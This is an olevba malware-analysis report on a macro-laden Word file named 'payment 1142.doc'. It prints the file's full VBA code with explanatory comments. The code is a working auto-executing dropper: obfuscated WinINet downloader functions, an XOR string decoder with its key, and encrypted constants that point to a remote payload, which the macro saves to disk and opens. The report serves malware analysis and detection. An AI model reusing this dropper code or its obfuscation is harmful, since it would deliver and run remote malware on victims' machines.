- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASIHB- payment 1142.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: payment 1142.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: payment 1142.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Auto-exec entry point: Word runs AutoOpen when the document is opened
- ' (the AutoExec row in the ANALYSIS table below). It does nothing itself
- ' except hand off to HAZ82771 (Module4), which in turn calls HONOOROA
- ' (Module5) where the actual dropper logic lives.
- Sub autoopen()
- HAZ82771
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module4.bas
- in file: payment 1142.doc - OLE stream: u'Macros/VBA/Module4'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- '*3
- Public Const HAZ82774 = "1E1002035E597C29373725252A76591C1B01061203137D307B3C2A3A2A36545D120159170615352379607678262054"
- '*4
- Public Const HAZ82773 = "2507041A14023A2A317D023F2F3D620A0510131E2B1439213527"
- '*5
- Public Const HAZ82772 = "svdvsdvSDVSDVCX1"
- ' Second hop of the auto-exec chain: autoopen -> HAZ82771 -> HONOOROA (Module5).
- ' Indirection only; no logic of its own.
- Sub HAZ82771()
- HONOOROA
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module11.bas
- in file: payment 1142.doc - OLE stream: u'Macros/VBA/Module11'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- '* 1
- Public Const HAZ82776 = "250C131F08581234263F2D35222C581C18"
- '*2
- Public Const HAZ82775 = "2A17191F081D362A677D76787B76540B13"
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+-------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+-------------+-----------------------------------------+
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+-------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: payment 1142.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' (File name: AddNewSheet.bas)
- ' Author: SENOO, Ken
- ' LICENSE: CC0
- ' (Last update: 2015-03-10T18:38+09:00)
- ' Replaces any worksheet named sheet_name with a fresh one inserted after
- ' the active sheet. This is Excel-object code (Worksheets, Sheets) sitting
- ' in a Word document and nothing in this dump calls it, so it is presumably
- ' filler taken from the CC0 snippet credited above.
- Sub AddNewSheet(sheet_name)
- Dim existing
- For Each existing In Worksheets
- If existing.Name = sheet_name Then
- ' Suppress the delete-confirmation prompt around the delete only.
- With Application
- .DisplayAlerts = False
- existing.Delete
- .DisplayAlerts = True
- End With
- End If
- Next existing
- With Sheets.Add(After:=ActiveSheet)
- .Name = sheet_name
- End With
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO UFO.frm
- in file: payment 1142.doc - OLE stream: u'Macros/VBA/UFO'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class1.cls
- in file: payment 1142.doc - OLE stream: u'Macros/VBA/Class1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Module3.bas
- in file: payment 1142.doc - OLE stream: u'Macros/VBA/Module3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Option Explicit
- ' Size of the InternetReadFile buffer and the byte count requested per read.
- Private Const KAIIOOOO872 = 8162
- ' Passed as sAgent to InternetOpenA, i.e. the literal HTTP User-Agent
- ' "KAIIOOOO871" -- a concrete network artifact of this sample.
- Private Const KAIIOOOO871 As String = "KAIIOOOO871"
- ' lAccessType for InternetOpenA; 1 is INTERNET_OPEN_TYPE_DIRECT in WinINet.
- Private Const KAIIOOOO999 = 1
- ' dwFlags for InternetOpenUrlA; 0x04000000 matches INTERNET_FLAG_NO_CACHE_WRITE
- ' (response not written to the WinINet cache) -- confirm against wininet.h.
- Private Const cCCc = &H4000000
- ' Downloader: fetches sURL over WinINet and writes the response body to
- ' sFileName as a binary file.
- '   Returns True only if at least one byte was buffered; stays False (the
- '   Boolean default) when InternetOpenA or InternetOpenUrlA returns 0.
- ' The callees are the obfuscated Declare aliases from Module2:
- '   SOLOMKA110222 = InternetOpenA, SOLOMKA1102 = InternetOpenUrlA,
- '   KOOOODAAAAA1 = InternetReadFile, SOLOMKA1102222 = InternetCloseHandle.
- Public Function SOLOMKA110(ByVal sURL As String, ByVal sFileName As String) As Boolean
- #If VBA7 And Win64 Then
- ' Session / request handles; pointer-sized on 64-bit VBA7.
- Dim HCDNNNDCNNDC2 As LongPtr, KAIIOOOO873 As LongPtr
- #Else
- Dim HCDNNNDCNNDC2 As Long, KAIIOOOO873 As Long
- #End If
- ' Bytes returned by the most recent InternetReadFile call.
- Dim CDSFDFD As Long
- ' Fixed-length 8162-byte read buffer and the accumulated response body.
- Dim HCDNNNDCNNDC As String * KAIIOOOO872, KAIIOOOO874 As String
- ' File number for the drop, and the byte count that decides the return value.
- Dim VVzzVz As Integer, dData As Double
- ' InternetOpenA(agent = "KAIIOOOO871", access type 1, no proxy, no bypass, flags 0).
- HCDNNNDCNNDC2 = SOLOMKA110222(KAIIOOOO871, KAIIOOOO999, vbNullString, vbNullString, 0)
- If HCDNNNDCNNDC2 = 0 Then
- ' Session handle leaks nothing here (it was never opened); returns False.
- Exit Function
- End If
- ' InternetOpenUrlA(session, sURL, no extra headers, 0, cCCc flags, context 0).
- KAIIOOOO873 = SOLOMKA1102(HCDNNNDCNNDC2, sURL, vbNullString, 0, cCCc, 0)
- If KAIIOOOO873 = 0 Then
- dData = 0
- Else
- ' First read. Note the whole fixed-length buffer is copied here, whereas
- ' later chunks are trimmed to CDSFDFD below.
- KOOOODAAAAA1 KAIIOOOO873, HCDNNNDCNNDC, KAIIOOOO872, CDSFDFD
- KAIIOOOO874 = HCDNNNDCNNDC
- ' Read until InternetReadFile reports 0 bytes.
- Do While CDSFDFD <> 0
- KOOOODAAAAA1 KAIIOOOO873, HCDNNNDCNNDC, KAIIOOOO872, CDSFDFD
- ' Filler: runs once with value 0, the "= 5" branch is unreachable.
- Dim HhhhhHHuuU73772 As Integer
- For HhhhhHHuuU73772 = 0 To 0
- If HhhhhHHuuU73772 = 5 Then End
- Next HhhhhHHuuU73772
- KAIIOOOO874 = KAIIOOOO874 + Mid(HCDNNNDCNNDC, 1, CDSFDFD)
- Loop
- ' Persist the body: binary write of the accumulated string to sFileName.
- dData = Len(KAIIOOOO874): VVzzVz = FreeFile
- Open sFileName For Binary Access Write Lock Write As #VVzzVz
- Put #VVzzVz, , KAIIOOOO874: Close #VVzzVz
- End If
- ' Close request then session handle (InternetCloseHandle takes them ByRef here).
- SOLOMKA1102222 KAIIOOOO873
- SOLOMKA1102222 HCDNNNDCNNDC2
- KAIIOOOO874 = ""
- ' Any non-zero byte count counts as success.
- If dData Then
- SOLOMKA110 = True
- End If
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+-------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+-------------+-----------------------------------------+
- | Suspicious | Open | May open a file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Put | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Binary | May read or write a binary file (if |
- | | | combined with Open) |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+-------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: payment 1142.doc - OLE stream: u'Macros/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' WinINet imports under obfuscated names; the Alias clause carries the real
- ' export, which is what matters for detection:
- '   SOLOMKA1102222 -> InternetCloseHandle
- '   SOLOMKA110222  -> InternetOpenA      (sAgent is sent as the HTTP User-Agent)
- '   KOOOODAAAAA1   -> InternetReadFile
- '   SOLOMKA1102    -> InternetOpenUrlA
- ' The two branches are identical except that handles are LongPtr on 64-bit
- ' VBA7. The ANALYSIS table below also reports hex and base64 strings for this
- ' module; no such literals are present, so those hits presumably come from
- ' the long random identifiers.
- #If VBA7 And Win64 Then
- Public Declare PtrSafe Function SOLOMKA1102222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
- Public Declare PtrSafe Function SOLOMKA110222 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
- Public Declare PtrSafe Function KOOOODAAAAA1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal cCCc3333 As LongPtr, ByVal HCDNNNDCNNDC As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
- Public Declare PtrSafe Function SOLOMKA1102 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
- #Else
- Public Declare Function SOLOMKA1102222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
- Public Declare Function SOLOMKA110222 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
- Public Declare Function KOOOODAAAAA1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal cCCc3333 As Long, ByVal HCDNNNDCNNDC As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
- Public Declare Function SOLOMKA1102 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
- #End If
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module5.bas
- in file: payment 1142.doc - OLE stream: u'Macros/VBA/Module5'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Dropper body, reached via autoopen -> HAZ82771 -> HONOOROA. Sequence:
- '   1. decode HAZ82773 and CreateObject it (HAZ82769);
- '   2. resolve special folder 2 and build the drop path HAZ82767 from it
- '      plus the decoded HAZ82775;
- '   3. delete any stale copy, then download decoded HAZ82774 to that path
- '      through SOLOMKA110 (Module3);
- '   4. decode HAZ82776, CreateObject it, and call .Open on the dropped file.
- ' This module has no Option Explicit, so HAZ82767, SSSS and SASASA are
- ' implicit Variants. Every "For x = 0 To 0 / If x = 5 Then End" block is
- ' unreachable filler. Comments are kept off the line-continuation
- ' statements, which must stay contiguous.
- Sub _
- HONOOROA()
- '* cASCAccaCACA
- Dim _
- HAZ82769
- Dim SiCoUnT As Integer
- Dim VgdgHH333jKKkllKAHNXNHHGDG87293 As Long
- ' Filler loop: SiCoUnT is assigned and never read.
- For VgdgHH333jKKkllKAHNXNHHGDG87293 = 17 To 20
- SiCoUnT = VgdgHH333jKKkllKAHNXNHHGDG87293 + 1
- Next VgdgHH333jKKkllKAHNXNHHGDG87293
- ' Object 1 from the decoded HAZ82773 ProgID; used below for
- ' GetSpecialFolder / FileExists / DeleteFile, so presumably a
- ' Scripting.FileSystemObject -- decode to confirm.
- Set HAZ82769 = CreateObject _
- (STOP7777777777 _
- (HAZ82772, HAZ82773))
- Dim HAZ82768
- ' Special-folder selector. If HAZ82769 is an FSO, 2 is TemporaryFolder -- confirm.
- Const HAZ82768ID = 2
- Dim JHAIICENAU019 As Integer
- For JHAIICENAU019 = 0 To 0
- If JHAIICENAU019 = 5 Then End
- Next JHAIICENAU019
- Set HAZ82768 = HAZ82769.GetSpecialFolder _
- (HAZ82768ID)
- Dim chdhai93 As Integer
- For chdhai93 = 0 To 0
- If chdhai93 = 5 Then End
- Next chdhai93
- ' Drop path = folder object's default property & decoded HAZ82775 (file name).
- HAZ82767 = HAZ82768 & STOP7777777777 _
- (HAZ82772, HAZ82775)
- Dim hiaopen847 As Integer
- For hiaopen847 = 0 To 0
- If hiaopen847 = 5 Then End
- Next hiaopen847
- ' Redundant second CreateObject of the same ProgID; overwrites HAZ82769.
- Set HAZ82769 = CreateObject _
- (STOP7777777777 _
- (HAZ82772, HAZ82773))
- Dim BnBnHgs346 As Integer
- For BnBnHgs346 = 0 To 0
- If BnBnHgs346 = 5 Then End
- Next BnBnHgs346
- ' Remove a previous copy of the drop, if any, before downloading.
- If HAZ82769.FileExists _
- (HAZ82767) Then
- HAZ82769. _
- DeleteFile HAZ82767
- End If
- ' Download decoded HAZ82774 (URL) to the drop path; the Boolean result is
- ' discarded, so execution proceeds even when the download failed.
- If SOLOMKA110(STOP7777777777 _
- (HAZ82772, HAZ82774), HAZ82767) Then
- End If
- ' Filler: SSSS is never used otherwise.
- Set SSSS = Nothing
- ' Empty existence check; no effect.
- If HAZ82769. _
- FileExists _
- (HAZ82767) Then
- End If
- ' Object 2 from the decoded HAZ82776 ProgID, then .Open on the dropped
- ' file: this is the execution step. Which object it is cannot be read
- ' from this dump without decoding HAZ82776.
- Set SASASA = CreateObject _
- (STOP7777777777 _
- (HAZ82772, HAZ82776))
- SASASA.Open HAZ82767
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Open | May open a file |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+--------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module6.bas
- in file: payment 1142.doc - OLE stream: u'Macros/VBA/Module6'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Option Explicit
- ' String decoder used for every encoded constant in this document.
- '   STOP777777777 (1st arg): plaintext key; always HAZ82772 at the call sites.
- '   STOP77777777  (2nd arg): ciphertext as a hex string, two characters per byte.
- ' Returns the decoded text. Byte i (1-based) is XORed with the key character
- ' at position (i Mod Len(key)) + 1, so the key stream starts at the key's
- ' second character and wraps. Len(...) / 2 is VBA floating-point division;
- ' for an odd-length input the bound is coerced to the Long loop counter.
- Public Function STOP7777777777(STOP777777777 As String, STOP77777777 As String) As String
- Dim asasas1 As Long
- ' Accumulated plaintext.
- Dim asasas1O As String
- ' One ciphertext byte and one key byte.
- Dim asasas10 As Integer
- Dim asasas101 As Integer
- For asasas1 = 1 To (Len(STOP77777777) / 2)
- ' Hex pair -> number via Val("&H..").
- asasas10 = Val("&H" & (Mid$(STOP77777777, (2 * asasas1) - 1, 2)))
- asasas101 = Asc(Mid$(STOP777777777, ((asasas1 Mod Len(STOP777777777)) + 1), 1))
- asasas1O = asasas1O + Chr(asasas10 Xor asasas101)
- Next asasas1
- STOP7777777777 = asasas1O
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+-------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+-------------+-----------------------------------------+
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Xor | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+-------------+-----------------------------------------+